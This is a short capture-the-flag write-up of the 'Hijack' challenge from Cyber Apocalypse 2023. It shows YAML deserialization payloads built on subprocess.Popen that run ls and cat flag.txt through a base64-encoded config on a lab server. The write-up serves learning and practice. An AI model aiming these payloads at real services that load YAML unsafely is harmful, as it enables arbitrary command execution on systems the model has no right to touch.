THE
WHITE
CIRCLE

misc

Cyber Apocalypse 2023

Hijack

Solved by Starry-Lord

Connect with nc to the docker instance, then create a config and decode the base 64. We can see it gives back YAML syntax so we can try to inject commands with subprocess.Popen:

After base64 encoding it, and using the “Load config” option, This worked!

!!python/object/apply:subprocess.Popen
- ls

I had to dig a little more to find how to give arguments to the command:

!!python/object/apply:subprocess.Popen
- !!python/tuple
  - ls
  - -la

And solved:

!!python/object/apply:subprocess.Popen
- !!python/tuple
  - cat
  - flag.txt

Published on : 27 Mar 2023